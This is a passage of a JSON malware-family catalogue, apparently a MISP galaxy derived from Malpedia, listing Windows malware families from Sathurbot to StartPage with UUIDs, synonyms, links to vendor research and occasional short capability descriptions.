"https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot", "https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/" ], "synonyms": [], "type": [] }, "uuid": "bdc7cc9c-c46d-4f77-b903-2335cc1a3369", "value": "Sathurbot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos", "https://securitykitten.github.io/2016/11/15/scanpos.html", "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware" ], "synonyms": [], "type": [] }, "uuid": "e3adbb0d-6d6e-4686-8108-ee76452339bf", "value": "ScanPOS" }, { "description": "Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). Entire code is Base64 encoded.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.schneiken", "https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb", "https://github.com/vithakur/schneiken" ], "synonyms": [], "type": [] }, "uuid": "92a65c89-acc3-4ee7-8db0-f0ea293ed12d", "value": "Schneiken" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scote", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/" ], "synonyms": [], "type": [] }, "uuid": "8c764bd6-2c6e-4cb2-93e3-f805cd99fe1e", "value": "Scote" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.screenlocker", "https://twitter.com/struppigel/status/791535679905927168" ], "synonyms": [], "type": [] }, "uuid": "9803b201-28e5-40c5-b661-c1a191388072", "value": "ScreenLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seadaddy", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" ], "synonyms": [], "type": [] }, "uuid": "1d07212e-6292-40a4-a5e9-30aef83b6207", "value": "SeaDaddy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seasalt", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "d66f466a-e70e-4b62-9a04-d62eb41da15c", "value": "SeaSalt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedll", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", "https://www.recordedfuture.com/chinese-threat-actor-tempperiscope/" ], "synonyms": [], "type": [] }, "uuid": "272268bb-2715-476b-a121-49142581c559", "value": "SeDll" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco", "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware_15.html", "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html" ], "synonyms": [ "azzy", "eviltoss" ], "type": [] }, "uuid": "21ab9e14-602a-4a76-a308-dbf5d6a91d75", "value": "Sedreco" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader", "https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/", "https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html", "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/", "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/", "https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/", "https://blog.xpnsec.com/apt28-hospitality-malware-part-2/", "https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed" ], "synonyms": [ "carberplike", "downrage", "jhuhugit", "jkeyskw" ], "type": [] }, "uuid": "6bd20349-1231-4aaa-ba2a-f4b09d3b344c", "value": "Seduploader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe" ], "synonyms": [], "type": [] }, "uuid": "503ca41c-7788-477c-869b-ac530f20c490", "value": "SendSafe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.serpico" ], "synonyms": [], "type": [] }, "uuid": "0d4ca924-7e7e-4385-b14d-f504b4d206e5", "value": "Serpico" }, { "description": "ServHelper is written in Delphi and according to ProofPoint best classified as a backdoor.\r\n\r\nProofPoint noticed two distinct variant - \"tunnel\" and \"downloader\" (citation):\r\n\"The 'tunnel' variant has more features and focuses on setting up reverse SSH tunnels to allow the threat actor to access the infected host via Remote Desktop Protocol (RDP). Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to 'hijack' legitimate user accounts or their web browser profiles and use them as they see fit. The 'downloader' variant is stripped of the tunneling and hijacking functionality and is used as a basic downloader.\"\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.servhelper", "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf", "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/", "https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/", "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware" ], "synonyms": [], "type": [] }, "uuid": "cebfa7af-8c31-4dda-8373-82893c7f43f4", "value": "ServHelper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowhammer", "https://skylightcyber.com/2019/03/28/unleash-the-hash-shadowhammer-mac-list/", "https://countercept.com/blog/analysis-shadowhammer-asus-attack-first-stage-payload/", "https://securelist.com/operation-shadowhammer/89992/", "https://blog.reversinglabs.com/blog/forging-the-shadowhammer", "https://www.vkremez.com/2019/03/lets-learn-dissecting-operation.html" ], "synonyms": [], "type": [] }, "uuid": "51728278-a95c-45a5-9ae0-9897d41d0efb", "value": "shadowhammer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad", "https://securelist.com/shadowpad-in-corporate-networks/81432/", "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf", "http://www.dailysecu.com/?mod=bbs&act=download&bbs_id=bbs_10&upload_idxno=4070" ], "synonyms": [ "XShellGhost" ], "type": [] }, "uuid": "e089e945-a523-4d11-a135-396f9b6c1dc7", "value": "ShadowPad" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti", "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/", "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/" ], "synonyms": [], "type": [] }, "uuid": "f64683c8-50ab-42c0-8b90-881598906528", "value": "Shakti" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shapeshift", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" ], "synonyms": [], "type": [] }, "uuid": "15dd8386-f11a-485a-b719-440c0a47dee6", "value": "SHAPESHIFT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shareip", "https://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" ], "synonyms": [ "remotecmd" ], "type": [] }, "uuid": "6f9ed0b0-63c8-4f51-8425-17cfc2b3c12e", "value": "shareip" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpknot", "https://eromang.zataz.com/tag/agentbase-exe/", "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf" ], "synonyms": [ "Bitrep" ], "type": [] }, "uuid": "d31f1c73-d14b-41e2-bb16-81ee1d886e43", "value": "SHARPKNOT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shelllocker", "https://twitter.com/JaromirHorejsi/status/813726714228604928" ], "synonyms": [], "type": [] }, "uuid": "af35e295-7087-4f6c-9f70-a431bf223822", "value": "ShellLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/" ], "synonyms": [], "type": [] }, "uuid": "6e668c0c-7085-4951-87d4-0334b6a5cdb3", "value": "Shifu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat", "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf" ], "synonyms": [], "type": [] }, "uuid": "67fc358f-da6a-4f01-be23-44bc97319127", "value": "Shim RAT" }, { "description": "SHIPSHAPE is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps.\r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shipshape", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "07470989-faac-44fb-b505-1d5568b3c716", "value": "SHIPSHAPE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shujin", "http://www.nyxbone.com/malware/chineseRansom.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/chinese-language-ransomware-makes-appearance/" ], "synonyms": [], "type": [] }, "uuid": "77c20bd9-5403-4f99-bae5-c54f3f38a6b6", "value": "Shujin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shurl0ckr", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/shurl0ckr-ransomware-as-a-service-peddled-on-dark-web-can-reportedly-bypass-cloud-applications" ], "synonyms": [], "type": [] }, "uuid": "f544ee0e-26f4-48e7-aaee-056f4d1ced82", "value": "Shurl0ckr" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock", "https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/", "http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html", "https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/", "https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/", "https://www.europol.europa.eu/newsroom/news/global-action-targeting-shylock-malware", "https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw" ], "synonyms": [ "Caphaw" ], "type": [] }, "uuid": "515ee69a-298a-4fcf-bdb0-c5fc6d41872f", "value": "Shylock" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder", "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c", "https://s.tencent.com/research/report/479.html" ], "synonyms": [], "type": [] }, "uuid": "3c43bd4c-8c40-47b5-ae97-3dd0f0c0e8d8", "value": "SideWinder" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/" ], "synonyms": [ "Destover" ], "type": [] }, "uuid": "da92c927-9b31-48aa-854a-8ed49a29565b", "value": "Sierra(Alfa,Bravo, ...)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.siggen6" ], "synonyms": [], "type": [] }, "uuid": "c12b3e30-32bf-4b7e-98f6-6a00e95553f8", "value": "Siggen6" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence", "http://www.intezer.com/silenceofthemoles/", "https://www.group-ib.com/resources/threat-research/silence.html", "https://securelist.com/the-silence/83009/", "https://reaqta.com/2019/01/silence-group-targeting-russian-banks/" ], "synonyms": [ "TrueBot" ], "type": [] }, "uuid": "0df52c23-690b-4703-83f7-5befc38ab376", "value": "Silence" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.silon", "http://www.internetnews.com/security/article.php/3846186/TwoHeaded+Trojan+Targets+Online+Banks.htm", "http://contagiodump.blogspot.com/2009/11/new-banking-trojan-w32silon-msjet51dll.html" ], "synonyms": [], "type": [] }, "uuid": "b602edb3-81c2-4772-b5f8-73deb85cb40a", "value": "Silon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.siluhdur" ], "synonyms": [], "type": [] }, "uuid": "774fcb67-1eeb-4bda-9b36-b624b632417a", "value": "Siluhdur" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.simda", "https://secrary.com/ReversingMalware/iBank/" ], "synonyms": [ "iBank" ], "type": [] }, "uuid": "467ee29c-317f-481a-a77c-69961eb88c4d", "value": "Simda" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal", "https://en.wikipedia.org/wiki/Torpig", "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2", "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan", "https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/" ], "synonyms": [ "Anserin", "Mebroot", "Quarian", "Theola", "Torpig" ], "type": [] }, "uuid": "ad5bcaef-1a86-4cc7-8f2e-32306b995018", "value": "Sinowal" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/", "https://medium.com/@Sebdraven/gobelin-panda-against-the-bears-1f462d00e3a4" ], "synonyms": [], "type": [] }, "uuid": "0fba78fc-47a1-45e1-b5df-71bcabd23b5d", "value": "Sisfader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.skarab_ransom", "http://malware-traffic-analysis.net/2017/11/23/index.html" ], "synonyms": [], "type": [] }, "uuid": "c1ccba65-e2f0-4f29-8e04-6b119c7f8694", "value": "Skarab Ransom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.skyplex" ], "synonyms": [], "type": [] }, "uuid": "39002a0d-99aa-4568-b110-48f6df1759cd", "value": "Skyplex" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slave", "https://www.cert.pl/en/news/single/slave-banatrix-and-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "1f4d8d42-8f31-47f8-b2b7-2d43196de532", "value": "Slave" }, { "description": "- 2012 first sighted\r\n- Attack vector via compromised Microtik routers where victim's got infection when they connect to Microtik router admin software - Winbox\r\n- 2018 when discovered by Kaspersky Team\r\n\r\nInfection Vector\r\n- Infected Microtik Router > Malicious DLL (IP4.dll) in Router > User connect via windbox > Malicious DLL downloaded on computer", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slingshot", "https://securelist.com/apt-slingshot/84312/", "https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf", "https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/" ], "synonyms": [], "type": [] }, "uuid": "d6178858-1244-41cf-aeed-8c6afc1d6846", "value": "Slingshot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slub", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/" ], "synonyms": [], "type": [] }, "uuid": "1bc01fca-9a1e-4669-bd9d-8dd29416f9c1", "value": "SLUB" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smac", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf" ], "synonyms": [ "speccom" ], "type": [] }, "uuid": "a8561caf-eb9f-4a02-8277-a898a0a259ae", "value": "smac" }, { "description": "The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader", "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/", "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/", "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis", "https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign", "https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo", "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/", "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/", "https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait", "https://www.cert.pl/en/news/single/dissecting-smoke-loader/", "https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/" ], "synonyms": [ "Dofoil" ], "type": [] }, "uuid": "ba91d713-c36e-4d98-9fb7-e16496a69eec", "value": "SmokeLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru", "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" ], "synonyms": [ "Ismo" ], "type": [] }, "uuid": "26b91007-a8ae-4e32-bd99-292e44735c3d", "value": "Smominru" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smrss32", "https://www.bleepingcomputer.com/forums/t/623132/smrss32-encrypted-ransomware-help-support-how-to-decryptbmp/", "https://www.youtube.com/watch?v=7gCU31ScJgk" ], "synonyms": [], "type": [] }, "uuid": "1fe0b2fe-5f9b-4359-b362-be611537442a", "value": "Smrss32 Ransomware" }, { "description": "A downloader trojan with some infostealer capabilities focused on the browser. Previously observed as part of RigEK campaigns.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader", "https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/", "https://twitter.com/VK_Intel/status/898549340121288704", "https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/", "https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/" ], "synonyms": [], "type": [] }, "uuid": "467c726e-6e19-4d15-88b6-362cbe0b3d20", "value": "SnatchLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sneepy", "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/" ], "synonyms": [ "ByeByeShell" ], "type": [] }, "uuid": "212d1ed7-0519-412b-a1ce-56046ca93372", "value": "SNEEPY" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula", "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf" ], "synonyms": [ "Ursnif" ], "type": [] }, "uuid": "4f3ad937-bf2f-40cb-9695-a2bedfd41bfa", "value": "Snifula" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snojan", "https://medium.com/@jacob16682/snojan-analysis-bb3982fb1bb9" ], "synonyms": [], "type": [] }, "uuid": "0646a6eb-1c13-4d87-878e-9431314597bf", "value": "Snojan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snslocker" ], "synonyms": [], "type": [] }, "uuid": "99a10948-d7ba-4ad0-b73c-c7762143a193", "value": "SNS Locker" }, { "description": "According to ESET, this RAT was derived from (the open-source) Quasar RAT.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sobaken", "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" ], "synonyms": [], "type": [] }, "uuid": "81e4fc8f-7b05-42bf-8ff9-568362d4f964", "value": "Sobaken" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.socks5_systemz" ], "synonyms": [], "type": [] }, "uuid": "38734f44-ebc4-4250-a20e-5dac0fb5c0ed", "value": "Socks5 Systemz" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot", "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", "https://www.accenture.com/t00010101T000000Z__w__/gb-en/_acnmedia/PDF-83/Accenture-Goldfin-Security-Alert.pdf", "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf" ], "synonyms": [ "BIRDDOG", "Nadrac" ], "type": [] }, "uuid": "da34bf80-6dc6-4b07-8094-8bed2c1176ec", "value": "SocksBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot", "https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/", "https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/" ], "synonyms": [ "Napolar" ], "type": [] }, "uuid": "d61a1656-9413-46de-bd19-c7fe5eda3371", "value": "Solarbot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.soraya", "https://www.codeandsec.com/Soraya-Malware-Analysis-Dropper", "https://www.arbornetworks.com/blog/asert/the-best-of-both-worlds-soraya/" ], "synonyms": [], "type": [] }, "uuid": "26aa3c43-5049-4a2e-bec1-9709b31a1a26", "value": "soraya" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sorgu", "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" ], "synonyms": [], "type": [] }, "uuid": "bc135ba5-637b-46c9-94fc-2eef5e018bb5", "value": "Sorgu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite", "https://attack.mitre.org/wiki/Software/S0157", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/", "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx" ], "synonyms": [ "denis" ], "type": [] }, "uuid": "f4cac204-3d3f-4bb6-84bd-fc27b2f5158c", "value": "SOUNDBITE" }, { "description": "SPACESHIP searches for files with a specified set of file extensions and copies them to\r\na removable drive. FireEye believes that SHIPSHAPE is used to copy SPACESHIP to a removable drive,\r\nwhich could be used to infect another victim computer, including an air-gapped computer. SPACESHIP is\r\nthen used to steal documents from the air-gapped system, copying them to a removable drive inserted\r\ninto the SPACESHIP-infected system", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spaceship", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "813e2761-6d68-493f-846b-2fc86d2e8079", "value": "SPACESHIP" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spedear", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" ], "synonyms": [], "type": [] }, "uuid": "bd29030e-d440-4842-bc2a-c173ed938da4", "value": "Spedear" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spora_ransom", "https://nakedsecurity.sophos.com/2017/06/26/how-spora-ransomware-tries-to-fool-antivirus/", "https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/", "https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas", "https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware", "https://github.com/MinervaLabsResearch/SporaVaccination", "http://malware-traffic-analysis.net/2017/01/17/index2.html" ], "synonyms": [], "type": [] }, "uuid": "7eeafa7c-0282-4667-bb1a-5ebc3a845d6d", "value": "Spora" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spybot" ], "synonyms": [], "type": [] }, "uuid": "34e9d701-22a1-4315-891d-443edd077abf", "value": "SpyBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spynet_rat" ], "synonyms": [], "type": [] }, "uuid": "1628467f-cad5-453c-a5da-a4f543747d58", "value": "win.spynet_rat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirtdanger", "https://researchcenter.paloaltonetworks.com/2018/04/unit42-squirtdanger-swiss-army-knife-malware-veteran-malware-author-thebottle/" ], "synonyms": [], "type": [] }, "uuid": "858a2cdb-9c89-436a-b8d4-60c725c7ac63", "value": "SquirtDanger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "009db412-762d-4256-8df9-eb213be01ffd", "value": "SslMM" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stabuniq", "http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html", "https://www.symantec.com/connect/blogs/trojanstabuniq-found-financial-institution-servers" ], "synonyms": [], "type": [] }, "uuid": "faa2196f-df4c-454c-995e-ded7864d5fa8", "value": "Stabuniq" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stampedo", "https://www.bleepingcomputer.com/news/security/stampado-ransomware-campaign-decrypted-before-it-started/" ], "synonyms": [], "type": [] }, "uuid": "b1efbadf-26e5-4e35-8fd2-61642c30ecbf", "value": "Stampedo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.starcruft", "https://securelist.com/operation-daybreak/75100/" ], "synonyms": [], "type": [] }, "uuid": "acd8fc63-c22a-4c11-907e-33e358fdd293", "value": "StarCruft" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.starloader", "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" ], "synonyms": [], "type": [] }, "uuid": "f1decba9-6b3b-4636-a2b6-2208e178591a", "value": "StarLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.starsypound", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "6df9bbd4-ab32-4d09-afdb-97eed274520a", "value": "StarsyPound" }, { "description": "Potentially unwanted program that changes the startpage of browsers to induce ad impressions.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.startpage", "https://www.bleepingcomputer.com/virus-removal/remove-search-searchetan.com-chrome-new-tab-page" ], "synonyms": [ "Easy Television Access Now" ], "type": [] }, "uuid": "033dbef5-eb51-4f7b-87e6-6dc4bef72841", "value": "StartPage" }, { "description": "", "meta": { "refs": [ 